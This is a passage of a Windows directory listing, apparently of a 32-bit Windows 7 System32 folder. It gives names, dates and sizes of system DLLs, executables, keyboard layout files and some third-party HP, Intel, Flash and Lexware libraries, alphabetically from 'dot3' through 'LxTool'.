14.07.2009  03:15            74.752 dot3gpclnt.dll
14.07.2009  03:15           265.728 dot3gpui.dll
14.07.2009  03:15            55.296 dot3hc.dll
21.11.2010  05:24           115.200 dot3msm.dll
21.11.2010  05:24           333.824 dot3ui.dll
14.07.2009  03:14            72.192 dpapimig.exe
04.03.2014  11:17            47.616 dpapiprovider.dll
14.07.2009  03:14            76.800 DpiScaling.exe
14.07.2009  03:14            29.184 dplaysvr.exe
14.07.2009  03:15           213.504 dplayx.dll
14.07.2009  03:15            23.040 dpmodemx.dll
21.11.2010  05:23             2.560 dpnaddr.dll
14.07.2009  03:15            57.344 dpnathlp.dll
02.11.2012  07:11           376.832 dpnet.dll
14.07.2009  03:15             7.168 dpnhpast.dll
14.07.2009  03:15             7.168 dpnhupnp.dll
14.07.2009  03:04             2.560 dpnlobby.dll
14.07.2009  03:14            33.280 dpnsvr.exe
14.07.2009  03:15            44.032 dpwsockx.dll
21.11.2010  05:24           257.024 dpx.dll
14.07.2009  03:14            66.048 driverquery.exe
08.11.2012  15:07    <DIR>          drivers
08.11.2012  15:07    <DIR>          DriverStore
14.06.2016  17:21           406.016 drmmgrtn.dll
14.06.2016  17:21           988.160 drmv2clt.dll
14.07.2009  03:15            18.944 drprov.dll
14.07.2009  03:15           225.280 drt.dll
14.07.2009  03:15            58.880 drtprov.dll
14.07.2009  03:15            43.008 drttransport.dll
02.07.2004  17:33           327.749 drvc.dll
06.01.2012  14:09           252.928 drvinst.exe
21.11.2010  05:24           323.072 drvstore.dll
14.07.2009  03:15            20.480 ds32gt.dll
21.11.2010  05:23            30.208 dsauth.dll
14.07.2009  03:15           173.568 dsdmo.dll
21.11.2010  05:24           252.928 DShowRdpFilter.dll
14.07.2009  03:15            87.040 dskquota.dll
21.11.2010  05:23           196.608 dskquoui.dll
14.07.2009  03:15           453.632 dsound.dll
14.07.2009  03:15           148.992 dsprop.dll
14.07.2009  03:15           395.776 dsquery.dll
14.07.2009  03:15            22.016 dsrole.dll
10.06.2009  23:34           215.943 dssec.dat
14.07.2009  03:15            44.032 dssec.dll
14.07.2009  03:17           156.728 dssenh.dll
21.11.2010  05:24           685.056 dsuiext.dll
14.07.2009  03:15            20.992 dswave.dll
14.07.2009  03:15            32.256 dtsh.dll
14.07.2009  03:15           717.824 dui70.dll
14.07.2009  03:15           181.248 duser.dll
14.07.2009  03:14             9.728 dvdplay.exe
14.07.2009  03:14            21.504 dvdupgrd.exe
09.07.2015  19:42            67.584 dwmapi.dll
09.07.2015  19:42         1.372.160 dwmcore.dll
10.02.2017  16:33         1.251.328 DWrite.dll
14.07.2009  03:14           130.048 DWWIN.EXE
14.07.2009  03:14           264.704 dxdiag.exe
21.11.2010  05:24           210.432 dxdiagn.dll
01.05.2013  08:32           293.376 dxgi.dll
12.08.2016  18:31             4.096 dxmasf.dll
21.11.2010  05:25           630.784 DXPTaskRingtone.dll
21.11.2010  05:24         1.400.320 DxpTaskSync.dll
16.04.2017  09:35           416.256 dxtmsft.dll
16.04.2017  09:22           279.040 dxtrans.dll
14.07.2009  03:15            88.064 dxva2.dll
21.11.2010  05:23           242.176 eapp3hst.dll
14.07.2009  03:15           183.296 eappcfg.dll
21.11.2010  05:23            94.208 eappgnui.dll
21.11.2010  05:23           222.208 eapphost.dll
14.07.2009  03:15            56.320 eappprxy.dll
14.07.2009  03:15            72.704 EAPQEC.DLL
14.07.2009  03:15            82.944 efsadu.dll
21.11.2010  05:24           205.312 efscore.dll
14.07.2009  03:14            12.288 efsui.exe
14.07.2009  03:15            24.576 efsutil.dll
21.11.2010  05:24           128.512 EhStorAPI.dll
14.07.2009  03:14           130.560 EhStorAuthn.exe
14.07.2009  03:15           105.472 EhStorPwdMgr.dll
14.07.2009  03:15           189.952 EhStorShell.dll
01.05.2013  08:40    <DIR>          el-GR
03.11.2015  20:55           179.712 els.dll
14.07.2009  03:15            38.912 ELSCore.dll
19.11.2013  10:42           194.048 elshyph.dll
14.07.2009  03:15           551.424 elslad.dll
21.11.2010  05:24            22.528 elsTrans.dll
12.05.2017  17:54    <DIR>          en-US
14.07.2009  03:15            20.992 encapi.dll
22.01.2016  08:04           535.040 EncDec.dll
14.07.2009  03:15            66.048 eqossnap.dll
01.05.2013  08:41    <DIR>          es-ES
14.07.2009  03:15           271.360 es.dll
06.01.2012  14:06         1.699.328 esent.dll
14.07.2009  03:15            38.912 esentprf.dll
14.07.2009  03:14           123.392 esentutl.exe
07.12.2012  12:46            51.712 esrb.rs
14.07.2009  05:20    <DIR>          et-EE
21.11.2010  05:24           288.256 eudcedit.exe
14.07.2009  03:15            16.896 eventcls.dll
14.07.2009  03:14            35.328 eventcreate.exe
10.06.2009  23:38            17.935 EventViewer_EventDetails.xsl
14.07.2009  03:14            79.872 eventvwr.exe
10.06.2009  23:38           145.127 eventvwr.msc
14.06.2016  17:21           489.984 evr.dll
14.07.2009  03:14            53.248 expand.exe
29.08.2016  16:55         2.972.672 explorer.exe
29.08.2016  17:12         1.499.648 ExplorerFrame.dll
14.07.2009  03:15           380.957 expsrv.dll
14.07.2009  03:14            53.248 extrac32.exe
14.07.2009  03:11             7.680 f3ahvoas.dll
21.11.2010  05:24           320.512 Faultrep.dll
14.07.2009  03:14            19.968 fc.exe
14.07.2009  03:15            98.304 fdBth.dll
14.07.2009  03:15             9.728 fdBthProxy.dll
21.11.2010  05:24           124.416 fde.dll
21.11.2010  05:24            59.904 fdeploy.dll
14.07.2009  03:15            41.984 fdPnp.dll
14.07.2009  03:15            27.136 fdProxy.dll
14.07.2009  03:15            76.800 fdSSDP.dll
14.07.2009  03:15            81.920 fdWCN.dll
14.07.2009  03:15            24.576 fdWNet.dll
14.07.2009  03:15           107.008 fdWSD.dll
14.07.2009  03:15            35.328 feclient.dll
01.05.2013  08:40    <DIR>          fi-FI
14.07.2009  03:15           444.416 filemgmt.dll
14.07.2009  03:14            13.824 find.exe
14.07.2009  03:15            58.368 findnetprinters.dll
21.11.2010  05:24            62.976 findstr.exe
14.07.2009  03:14            10.240 finger.exe
14.07.2009  03:14             4.608 Firewall.cpl
14.07.2009  03:15           462.848 FirewallAPI.dll
21.11.2010  05:23           856.576 FirewallControlPanel.dll
14.11.2015  00:49            14.336 fixmapi.exe
01.07.2015  20:40            51.752 FKStampPainter20.dll
13.05.2017  19:31           803.320 FlashPlayerApp.exe
13.05.2017  19:31           144.888 FlashPlayerCPLApp.cpl
13.05.2017  19:31         5.821.944 FlashPlayerInstaller.exe
14.07.2009  03:15            14.848 fltLib.dll
14.07.2009  03:14            18.944 fltMC.exe
24.06.2015  01:29         1.217.192 FM20.DLL
20.03.2010  21:11            36.736 FM20DEU.DLL
20.02.2010  18:20            31.616 FM20ENU.DLL
14.07.2009  03:15            23.552 fmifs.dll
21.11.2010  05:24            93.696 fms.dll
21.11.2010  05:24           828.928 fontext.dll
10.03.2017  18:19            70.656 fontsub.dll
14.07.2009  03:14           104.448 fontview.exe
14.07.2009  03:14            43.008 forfiles.exe
14.07.2009  01:15            35.840 format.com
07.12.2012  12:46            46.592 fpb.rs
21.11.2010  05:24            98.304 fphc.dll
01.05.2013  08:41    <DIR>          fr-FR
21.11.2010  05:24           202.752 framedyn.dll
21.11.2010  05:24           206.336 framedynos.dll
10.06.2009  23:21           144.909 fsmgmt.msc
06.01.2012  14:06            74.240 fsutil.exe
14.07.2009  03:15           179.712 fthsvc.dll
21.11.2010  05:24            42.496 ftp.exe
14.07.2009  03:15           167.424 fundisc.dll
14.07.2009  03:15            57.856 fwcfg.dll
12.10.2013  04:01           216.576 FWPUCLNT.DLL
12.05.2016  17:18            44.032 FwRemoteSvr.dll
14.07.2009  03:15           227.328 FXSAPI.dll
14.07.2009  03:15            78.336 FXSCOM.dll
14.07.2009  03:15           472.576 FXSCOMEX.dll
14.07.2009  03:15            40.448 FXSEXT32.dll
14.07.2009  03:05           925.184 FXSRESM.dll
14.07.2009  07:32    <DIR>          FxsTmp
14.07.2009  03:15           457.216 FXSXP32.dll
21.11.2010  05:24            45.568 g711codc.ax
07.12.2012  14:20         2.576.384 gameux.dll
14.07.2009  03:05         4.240.384 GameUXLegacyGDFs.dll
10.06.2009  23:30            24.006 gb2312.uce
14.07.2009  03:15           120.832 gcdef.dll
07.04.2017  17:22           312.832 gdi32.dll
14.07.2009  03:14            65.024 getmac.exe
14.07.2009  03:15             7.680 getuname.dll
14.07.2009  03:15           315.392 glmf32.dll
14.07.2009  03:15           130.048 glu32.dll
12.05.2016  17:18            79.360 gpapi.dll
14.07.2009  03:15           951.808 gpedit.dll
10.06.2009  23:28           147.439 gpedit.msc
12.05.2016  17:18           591.872 gpprefcl.dll
14.07.2009  03:15            33.792 gpprnext.dll
14.07.2009  03:14           128.000 gpresult.exe
12.05.2016  16:57            30.720 gpscript.dll
12.05.2016  16:57            24.576 gpscript.exe
14.07.2009  03:15            18.944 gptext.dll
14.07.2009  03:14            16.896 gpupdate.exe
07.12.2012  12:46            21.504 grb.rs
14.07.2009  03:14            16.384 grpconv.exe
21.11.2010  05:24            66.560 hbaapi.dll
14.07.2009  03:15            26.112 hcproviders.dll
14.07.2009  03:14           234.496 hdwwiz.cpl
14.07.2009  03:14            64.512 hdwwiz.exe
14.07.2009  05:20    <DIR>          he-IL
14.07.2009  03:14             8.704 help.exe
14.07.2009  03:15            55.808 HelpPaneProxy.dll
21.11.2010  05:23           312.832 hgcpl.dll
14.07.2009  03:14            15.360 hh.exe
14.07.2009  03:14           523.776 hhctrl.ocx
14.07.2009  03:15            43.008 hhsetup.dll
14.07.2009  03:15            22.016 hid.dll
14.07.2009  03:14            30.720 hidphone.tsp
14.07.2009  03:15            49.152 hidserv.dll
20.11.2016  18:19            84.992 hlink.dll
14.07.2009  03:15           288.256 hnetcfg.dll
14.07.2009  03:15            14.848 hnetmon.dll
14.07.2009  03:14             8.704 HOSTNAME.EXE
22.06.2012  04:38           939.936 hpbuio32.dll
22.06.2012  04:38           430.496 hpbuiodm32.dll
22.06.2012  04:38           189.856 hpbuiofax32.dll
28.09.2011  09:34           316.928 hpcc3117.DLL
19.04.2011  20:57           511.488 hpcdmc32.DLL
18.06.2013  06:24           776.096 hpptsplj276.dll
16.09.2009  18:40             9.749 hptcpmui.hlp
22.06.2012  04:38           106.400 HPUnifiedIODotNET.dll
13.04.2011  16:07            54.784 HPZidr12.dll
13.04.2011  16:07            39.424 HPZipr12.dll
14.07.2009  05:20    <DIR>          hr-HR
16.04.2017  10:01           341.504 html.iec
21.11.2010  05:24            34.816 httpapi.dll
14.07.2009  03:15            33.792 htui.dll
01.05.2013  08:40    <DIR>          hu-HU
14.07.2009  03:14           197.632 iac25_32.ax
14.07.2009  03:15            19.456 ias.dll
21.11.2010  05:24            78.848 iasacct.dll
14.07.2009  03:15            59.392 iasads.dll
14.07.2009  03:15            49.664 iasdatastore.dll
14.07.2009  03:15            81.408 iashlpr.dll
14.07.2009  03:16           485.376 IasMigPlugin.dll
14.07.2009  03:15           157.696 iasnap.dll
14.07.2009  03:15            34.304 iaspolcy.dll
21.11.2010  05:24           172.032 iasrad.dll
21.11.2010  05:24           122.880 iasrecst.dll
14.07.2009  03:15           191.488 iassam.dll
14.07.2009  03:15           322.560 iassdo.dll
14.07.2009  03:15            77.824 iassvcs.dll
14.07.2009  03:14            27.136 icacls.exe
09.03.2014  23:47           619.672 icardagt.exe
19.11.2013  10:42            69.120 icardie.dll
01.07.2014  00:14             8.856 icardres.dll
21.11.2010  05:25            82.944 iccvid.dll
09.02.2017  18:14           215.040 icm32.dll
14.07.2009  03:05             3.072 icmp.dll
14.07.2009  03:15            21.504 icmui.dll
14.07.2009  03:15             9.728 IconCodecService.dll
10.06.2009  23:15             8.798 icrav03.rat
14.07.2009  03:15           143.360 icsigd.dll
14.07.2009  03:14            14.336 icsunattend.exe
14.07.2009  05:20    <DIR>          icsxml
10.06.2009  23:30            60.458 ideograf.uce
14.07.2009  03:15            33.792 idndl.dll
14.07.2009  03:15            45.056 IDStore.dll
19.11.2013  10:42           111.616 IEAdvpack.dll
19.11.2013  10:42           616.104 ieapfltr.dat
16.04.2017  08:34           710.144 ieapfltr.dll
20.04.2017  01:16           346.320 iedkcs32.dll
16.04.2017  10:01            47.616 ieetwproxystub.dll
16.04.2017  08:53        13.661.184 ieframe.dll
19.11.2013  10:42           116.736 iepeers.dll
16.04.2017  09:52            30.720 iernonce.dll
16.04.2017  09:53         2.290.176 iertutil.dll
16.04.2017  10:02            62.464 iesetup.dll
19.11.2013  10:42            86.016 iesysprep.dll
16.04.2017  09:48           476.160 ieui.dll
13.03.2015  03:55            16.303 ieuinit.inf
16.04.2017  09:47           115.712 ieUnatt.exe
19.11.2013  10:42           151.552 iexpress.exe
14.07.2009  03:15            20.992 ifmon.dll
21.11.2010  05:24           148.992 ifsutil.dll
14.07.2009  03:15             8.704 ifsutilx.dll
18.01.2012  09:00        13.001.728 ig7icd32.dll
10.06.2009  22:37           417.344 igcompkrng500.bin
18.01.2012  10:49         7.781.888 igd10umd32.dll
18.01.2012  10:27         2.864.128 igdbcl32.dll
18.01.2012  11:12            58.880 igdde32.dll
18.01.2012  09:44        23.506.944 igdfcl32.dll
18.01.2012  10:26           522.752 igdrcl32.dll
18.01.2012  11:12         6.117.888 igdumd32.dll
10.06.2009  22:37           139.824 igfcg500.bin
10.06.2009  22:37            97.448 igfcg500m.bin
18.01.2012  11:43           559.780 igfcg700m.bin
18.01.2012  08:48         2.321.408 igfxcmjit32.dll
18.01.2012  08:48           237.056 igfxcmrt32.dll
18.01.2012  08:50           321.024 igfxdv32.dll
18.01.2012  08:51            25.088 igfxexps32.dll
10.06.2009  22:37           982.196 igkrng500.bin
18.01.2012  11:43           734.772 igkrng700.bin
18.01.2012  08:48           177.152 iglhcp32.dll
15.12.2011  15:34           519.680 iglhsip32.dll
14.07.2009  03:14            17.920 imaadp32.acm
19.10.2013  03:36           159.232 imagehlp.dll
14.07.2009  03:06        20.268.032 imageres.dll
14.07.2009  03:06           705.536 imagesp1.dll
14.09.2009  20:05         1.762.608 imagx7.dll
14.09.2009  20:04           497.296 imagxpr7.dll
14.09.2009  20:05           263.472 imagxr7.dll
14.09.2009  20:05           808.240 imagxra7.dll
14.07.2009  03:15           109.056 imapi.dll
21.11.2010  05:24           392.192 imapi2.dll
21.11.2010  05:24           732.160 imapi2fs.dll
14.07.2009  05:20    <DIR>          IME
19.11.2013  10:42            36.352 imgutil.dll
11.10.2016  17:18         1.027.584 IMJP10.IME
11.10.2016  17:18           701.440 IMJP10K.DLL
11.10.2016  17:18           430.080 imkr80.ime
21.11.2010  05:24           119.808 imm32.dll
13.01.2017  19:45           741.888 inetcomm.dll
16.04.2017  09:08         2.057.216 inetcpl.cpl
21.11.2010  05:23            52.736 inetmib1.dll
13.01.2017  19:45            84.480 INETRES.dll
14.07.2009  04:36    <DIR>          inetsrv
14.07.2009  03:14             9.216 InfDefaultInstall.exe
09.03.2014  23:47            99.480 infocardapi.dll
10.06.2009  23:14            34.120 infocardcpl.cpl
09.03.2016  20:34           216.064 InkEd.dll
11.10.2016  17:18           202.240 input.dll
16.04.2017  09:28            91.136 inseng.dll
14.07.2009  05:20    <DIR>          InstallShield
29.09.2013  11:37               866 InstallUtil.InstallLog
28.04.2017  02:08             7.680 instnm.exe
18.02.2002  19:40             6.200 INT13EXT.VXD
30.01.2012  09:14           276.248 IntelCpHeciSvc.exe
18.01.2012  10:26           188.416 IntelOpenCL32.dll
21.11.2010  05:24           345.088 intl.cpl
04.02.2014  04:00             2.048 iologmsg.dll
14.07.2009  03:15            10.752 IPBusEnumProxy.dll
14.07.2009  03:14            27.136 ipconfig.exe
21.11.2010  05:24           103.936 IPHLPAPI.DLL
14.07.2009  03:06             2.560 iprop.dll
14.07.2009  03:15             8.192 iprtprio.dll
21.11.2010  05:24           271.360 iprtrmgr.dll
14.07.2009  03:15           757.760 ipsecsnp.dll
21.11.2010  05:24           400.896 ipsmsnap.dll
14.07.2009  03:15           197.632 ir32_32.dll
14.07.2009  03:14           839.680 ir41_32.ax
14.07.2009  03:15           120.320 ir41_qc.dll
14.07.2009  03:15           120.320 ir41_qcx.dll
14.07.2009  03:15           746.496 ir50_32.dll
14.07.2009  03:15           200.192 ir50_qc.dll
14.07.2009  03:15           200.192 ir50_qcx.dll
14.07.2009  03:15            15.360 irclass.dll
14.07.2009  03:14           418.816 irprops.cpl
21.11.2010  05:24           144.896 iscsicli.exe
14.07.2009  03:15           218.624 iscsicpl.dll
14.07.2009  03:14           120.320 iscsicpl.exe
14.07.2009  03:15            50.688 iscsidsc.dll
14.07.2009  03:15             8.192 iscsied.dll
21.11.2010  05:24            28.672 iscsium.dll
14.07.2009  03:15            66.048 iscsiwmi.dll
21.11.2010  05:25            86.528 isoburn.exe
01.05.2013  08:41    <DIR>          it-IT
21.11.2010  05:24           158.720 itircl.dll
14.07.2009  03:15           142.848 itss.dll
21.11.2010  05:25           219.648 iTVData.dll
09.12.2011  02:14             1.536 IusEventLog.dll
14.07.2009  03:14           146.944 ivfsrc.ax
21.11.2010  05:23            50.176 iyuv_32.dll
01.05.2013  08:40    <DIR>          ja-JP
16.04.2017  09:30            60.416 JavaScriptCollectionAgent.dll
14.07.2009  03:14           138.240 joy.cpl
16.04.2017  09:47           663.552 jscript.dll
16.04.2017  09:08         4.548.608 jscript9.dll
16.04.2017  09:46           620.032 jscript9diag.dll
19.11.2013  10:42           645.120 jsIntl.dll
16.04.2017  09:52            47.104 jsproxy.dll
10.06.2009  23:30             6.948 kanji_1.uce
10.06.2009  23:30             8.484 kanji_2.uce
14.07.2009  03:11             7.168 kbd101.DLL
14.07.2009  03:11             7.168 kbd101a.DLL
14.07.2009  03:11             7.168 kbd101b.DLL
14.07.2009  03:11             7.168 kbd101c.DLL
14.07.2009  03:11             7.168 kbd103.DLL
14.07.2009  03:11             7.680 kbd106.dll
14.07.2009  03:11             7.680 kbd106n.dll
14.07.2009  03:11             6.656 KBDA1.DLL
14.07.2009  03:11             6.656 KBDA2.DLL
14.07.2009  03:11             7.168 KBDA3.DLL
14.07.2009  03:11             7.168 KBDAL.DLL
14.07.2009  03:11             6.144 KBDARME.DLL
14.07.2009  03:11             6.144 KBDARMW.DLL
14.07.2009  03:11             7.680 kbdax2.dll
09.10.2015  01:18             7.168 KBDAZE.DLL
09.10.2015  01:18             6.656 KBDAZEL.DLL
09.07.2014  03:31             6.656 KBDBASH.DLL
14.07.2009  03:11             6.656 KBDBE.DLL
14.07.2009  03:11             7.168 KBDBENE.DLL
14.07.2009  03:11             6.656 KBDBGPH.DLL
14.07.2009  03:11             6.656 KBDBGPH1.DLL
14.07.2009  03:11             7.168 KBDBHC.DLL
21.11.2010  05:24             6.656 KBDBLR.DLL
14.07.2009  03:11             6.656 KBDBR.DLL
14.07.2009  03:11             6.656 KBDBU.DLL
21.11.2010  05:24             6.656 KBDBULG.DLL
14.07.2009  03:11             7.168 KBDCA.DLL
14.07.2009  03:11             8.704 KBDCAN.DLL
14.07.2009  03:11             7.680 KBDCR.DLL
14.07.2009  03:11             7.680 KBDCZ.DLL
21.11.2010  05:24             7.680 KBDCZ1.DLL
14.07.2009  03:11             7.680 KBDCZ2.DLL
14.07.2009  03:11             6.656 KBDDA.DLL
14.07.2009  03:11             6.656 KBDDIV1.DLL
14.07.2009  03:11             6.656 KBDDIV2.DLL
14.07.2009  03:11             6.656 KBDDV.DLL
14.07.2009  03:11             7.680 KBDES.DLL
14.07.2009  03:11             6.656 KBDEST.DLL
14.07.2009  03:11             6.144 KBDFA.DLL
14.07.2009  03:11             7.680 KBDFC.DLL
14.07.2009  03:11             6.656 KBDFI.DLL
14.07.2009  03:11             8.192 KBDFI1.DLL
14.07.2009  03:11             6.656 KBDFO.DLL
14.07.2009  03:11             6.656 KBDFR.DLL
14.07.2009  03:11             6.144 KBDGAE.DLL
21.11.2010  05:24             6.656 KBDGEO.DLL
14.07.2009  03:11             7.168 kbdgeoer.dll
09.10.2015  01:18             6.656 kbdgeoqw.dll
21.11.2010  05:24             7.680 KBDGKL.DLL
14.07.2009  03:11             6.656 KBDGR.DLL
21.11.2010  05:24             7.680 KBDGR1.DLL
14.07.2009  03:11             8.192 KBDGRLND.DLL
14.07.2009  03:11             6.656 KBDHAU.DLL
14.07.2009  03:11             6.656 KBDHE.DLL
14.07.2009  03:11             7.168 KBDHE220.DLL
14.07.2009  03:11             7.168 KBDHE319.DLL
14.07.2009  03:11             6.656 KBDHEB.DLL
14.07.2009  03:11             7.168 KBDHELA2.DLL
14.07.2009  03:11             7.168 KBDHELA3.DLL
14.07.2009  03:11             9.216 KBDHEPT.DLL
14.07.2009  03:11             7.168 KBDHU.DLL
14.07.2009  03:11             6.656 KBDHU1.DLL
14.07.2009  03:11             7.680 kbdibm02.DLL
14.07.2009  03:11             7.168 KBDIBO.DLL
14.07.2009  03:11             6.656 KBDIC.DLL
14.07.2009  03:11             6.656 KBDINASA.DLL
14.07.2009  03:11             6.656 KBDINBE1.DLL
14.07.2009  03:11             6.656 KBDINBE2.DLL
21.11.2010  05:24             7.168 KBDINBEN.DLL
14.07.2009  03:11             7.168 KBDINDEV.DLL
14.07.2009  03:11             6.656 KBDINGUJ.DLL
21.11.2010  05:24             7.168 KBDINHIN.DLL
21.11.2010  05:24             7.168 KBDINKAN.DLL
14.07.2009  03:11             7.168 KBDINMAL.DLL
21.11.2010  05:24             7.168 KBDINMAR.DLL
21.11.2010  05:24             7.168 KBDINORI.DLL
14.07.2009  03:11             6.656 KBDINPUN.DLL
21.11.2010  05:24             7.168 KBDINTAM.DLL
21.11.2010  05:24             6.656 KBDINTEL.DLL
14.07.2009  03:11             8.192 KBDINUK2.DLL
14.07.2009  03:11             6.144 KBDIR.DLL
14.07.2009  03:11             6.144 KBDIT.DLL
14.07.2009  03:11             6.656 KBDIT142.DLL
14.07.2009  03:11             7.680 KBDIULAT.DLL
14.07.2009  03:11            11.264 KBDJPN.DLL
14.07.2009  03:11             6.656 KBDKAZ.DLL
14.07.2009  03:11             7.168 KBDKHMR.DLL
14.07.2009  03:11            10.752 KBDKOR.DLL
14.07.2009  03:11             6.144 KBDKYR.DLL
14.07.2009  03:11             7.168 KBDLA.DLL
14.07.2009  03:11             7.168 KBDLAO.DLL
21.11.2010  05:24             7.680 kbdlk41a.dll
14.07.2009  03:11             6.144 KBDLT.DLL
21.11.2010  05:24             6.656 KBDLT1.DLL
14.07.2009  03:11             6.656 KBDLT2.DLL
14.07.2009  03:11             6.656 KBDLV.DLL
14.07.2009  03:11             7.168 KBDLV1.DLL
14.07.2009  03:11             6.656 KBDMAC.DLL
14.07.2009  03:11             6.656 KBDMACST.DLL
21.11.2010  05:24             6.656 KBDMAORI.DLL
14.07.2009  03:11             7.168 KBDMLT47.DLL
14.07.2009  03:11             7.168 KBDMLT48.DLL
21.11.2010  05:24             6.656 KBDMON.DLL
14.07.2009  03:11             6.656 KBDMONMO.DLL
14.07.2009  03:11             6.656 KBDNE.DLL
14.07.2009  03:11             7.680 kbdnec.DLL
14.07.2009  03:11             8.192 kbdnec95.DLL
14.07.2009  03:11             9.728 kbdnecat.DLL
14.07.2009  03:11             8.192 kbdnecnt.DLL
21.11.2010  05:24             7.168 KBDNEPR.DLL
14.07.2009  03:11             6.656 KBDNO.DLL
14.07.2009  03:11             8.192 KBDNO1.DLL
14.07.2009  03:11             7.680 KBDNSO.DLL
14.07.2009  03:11             6.656 KBDPASH.DLL
14.07.2009  03:11             7.168 KBDPL.DLL
14.07.2009  03:11             7.168 KBDPL1.DLL
21.11.2010  05:24             7.168 KBDPO.DLL
14.07.2009  03:11             8.192 KBDRO.DLL
14.07.2009  03:11             8.192 KBDROPR.DLL
14.07.2009  03:11             8.192 KBDROST.DLL
09.07.2014  03:31             6.656 KBDRU.DLL
09.07.2014  03:31             6.656 KBDRU1.DLL
21.11.2010  05:24             7.168 KBDSF.DLL
21.11.2010  05:24             7.680 KBDSG.DLL
14.07.2009  03:11             7.168 KBDSL.DLL
14.07.2009  03:11             7.680 KBDSL1.DLL
14.07.2009  03:11             8.192 KBDSMSFI.DLL
14.07.2009  03:11             8.192 KBDSMSNO.DLL
14.07.2009  03:11             6.656 KBDSN1.DLL
14.07.2009  03:11             7.680 KBDSOREX.DLL
14.07.2009  03:11             7.168 KBDSORS1.DLL
14.07.2009  03:11             7.680 KBDSORST.DLL
14.07.2009  03:11             7.168 KBDSP.DLL
14.07.2009  03:11             7.168 KBDSW.DLL
14.07.2009  03:11             7.680 KBDSW09.DLL
14.07.2009  03:11             6.656 KBDSYR1.DLL
14.07.2009  03:11             6.656 KBDSYR2.DLL
21.11.2010  05:24             6.656 KBDTAJIK.DLL
09.07.2014  03:31             7.168 KBDTAT.DLL
14.07.2009  03:11             6.656 KBDTH0.DLL
14.07.2009  03:11             6.656 KBDTH1.DLL
14.07.2009  03:11             6.656 KBDTH2.DLL
14.07.2009  03:11             6.656 KBDTH3.DLL
14.07.2009  03:11             7.680 KBDTIPRC.DLL
21.11.2010  05:24             7.680 KBDTUF.DLL
21.11.2010  05:24             7.680 KBDTUQ.DLL
21.11.2010  05:24             6.656 KBDTURME.DLL
14.07.2009  03:11             6.656 KBDUGHR.DLL
21.11.2010  05:24             6.656 KBDUGHR1.DLL
14.07.2009  03:11             6.656 KBDUK.DLL
14.07.2009  03:11             7.680 KBDUKX.DLL
14.07.2009  03:11             6.144 KBDUR.DLL
14.07.2009  03:11             7.168 KBDUR1.DLL
14.07.2009  03:11             6.144 KBDURDU.DLL
21.11.2010  05:24             6.656 KBDUS.DLL
14.07.2009  03:11             6.656 KBDUSA.DLL
14.07.2009  03:11             6.656 KBDUSL.DLL
14.07.2009  03:11             6.656 KBDUSR.DLL
14.07.2009  03:11             7.168 KBDUSX.DLL
14.07.2009  03:11             6.656 KBDUZB.DLL
14.07.2009  03:11             6.656 KBDVNTC.DLL
14.07.2009  03:11             6.656 KBDWOL.DLL
09.07.2014  03:31             7.168 KBDYAK.DLL
14.07.2009  03:11             7.168 KBDYBA.DLL
14.07.2009  03:11             7.168 KBDYCC.DLL
14.07.2009  03:11             8.192 KBDYCL.DLL
28.04.2017  02:32           553.472 kerberos.dll
28.04.2017  02:32         1.114.112 kernel32.dll
28.04.2017  02:32           275.456 KernelBase.dll
14.07.2009  03:15            19.456 keyiso.dll
14.07.2009  03:15           158.720 keymgr.dll
14.07.2009  03:14            38.912 kmddsp.tsp
01.05.2013  08:40    <DIR>          ko-KR
10.06.2009  23:30            12.876 korean.uce
14.07.2009  03:15           145.408 korwbrkr.dll
10.06.2009  23:29        11.967.524 korwbrkr.lex
08.12.2015  23:53           193.536 ksproxy.ax
21.11.2010  05:25            84.480 kstvtune.ax
08.12.2015  23:53             4.608 ksuser.dll
21.11.2010  05:24           107.008 Kswdmcap.ax
21.11.2010  05:25            48.640 ksxbar.ax
14.07.2009  03:14            14.848 ktmutil.exe
14.07.2009  03:15            20.480 ktmw32.dll
14.07.2009  03:15            57.344 l2gpstore.dll
14.07.2009  03:15            54.272 l2nacp.dll
14.07.2009  03:15           180.224 L2SecHC.dll
14.07.2009  03:14            64.000 l3codeca.acm
14.07.2009  03:14           220.672 l3codecp.acm
14.07.2009  03:14            14.336 label.exe
14.07.2009  03:15             9.728 LAPRXY.DLL
10.06.2009  23:41           211.938 lcphrase.tbl
10.06.2009  23:41            24.114 lcptr.tbl
05.05.2008  14:52           134.656 LexEBankCommon10VC8.dll
07.07.2014  18:22           181.288 LexEBankCommon40.dll
07.11.2012  20:03            55.513 license.rtf
19.11.2013  10:42            24.576 licmgr10.dll
14.07.2009  03:15            22.016 linkinfo.dll
22.09.2010  00:03           208.768 LIVESSP.DLL
22.04.2017  18:05                 5 lMMLDeleteUserData42107612FX.tmp
14.07.2009  03:15           115.712 loadperf.dll
11.10.2016  15:18           419.648 locale.nls
21.11.2010  05:24           429.056 localsec.dll
14.07.2009  03:15           226.816 LocationApi.dll
14.07.2009  03:14            89.600 LocationNotifications.exe
10.06.2009  23:16             2.727 locationnotificationsview.xml
14.07.2009  03:14            42.496 lodctr.exe
25.05.2017  21:53                18 log.txt
21.11.2010  05:24            95.232 logagent.exe
14.07.2009  07:32    <DIR>          LogFiles
14.07.2009  03:15            69.632 loghours.dll
25.05.2015  20:00            82.944 logman.exe
21.11.2010  05:24           127.488 logoncli.dll
10.03.2017  18:20            25.600 lpk.dll
21.11.2010  05:23            21.504 lsmproxy.dll
14.07.2009  05:20    <DIR>          lt-LT
21.11.2010  05:24            41.984 luainstall.dll
10.06.2009  23:26           144.998 lusrmgr.msc
14.07.2009  05:20    <DIR>          lv-LV
24.06.2015  12:48           213.032 LxBasics100.dll
24.06.2015  12:48            70.184 LxCI12.dll
24.06.2015  12:48            51.752 LXCurr100.dll
21.01.2014  10:30           321.576 LxDNT100.dll
06.11.2014  11:51           322.088 LxDNT115.dll
21.01.2014  10:30            76.840 LxDNTvm100.dll
06.11.2014  11:51            76.840 LxDNTvm115.dll
21.01.2014  10:30           140.840 LxDNTvmc100.dll
06.11.2014  11:51           140.840 LxDNTvmc115.dll
17.10.2013  13:29           362.024 LxHtmlCtl.ocx
24.06.2015  12:48           129.576 LxMail100.dll
06.11.2014  11:51           209.960 LXPrnUtil10.dll
24.06.2015  12:48            65.576 LxPXTree100.dll
06.11.2014  11:51           141.352 LXReportManage.ocx
18.03.2013  17:44         1.361.464 LxTool110.dll
01.07.2013  17:50         1.362.488 LxTool111.dll
15.05.2014  11:22         1.341.992 LxTool112.dll
24.06.2015  12:48         1.341.992 LxTool115.dll
29.08.2010  19:51         1.138.688 LXtool60NSVC8.dll
29.08.2010  19:54         1.130.496 LxTool60VC8.dll
29.08.2010  18:14         1.204.224 LxTool65NSVC8.dll
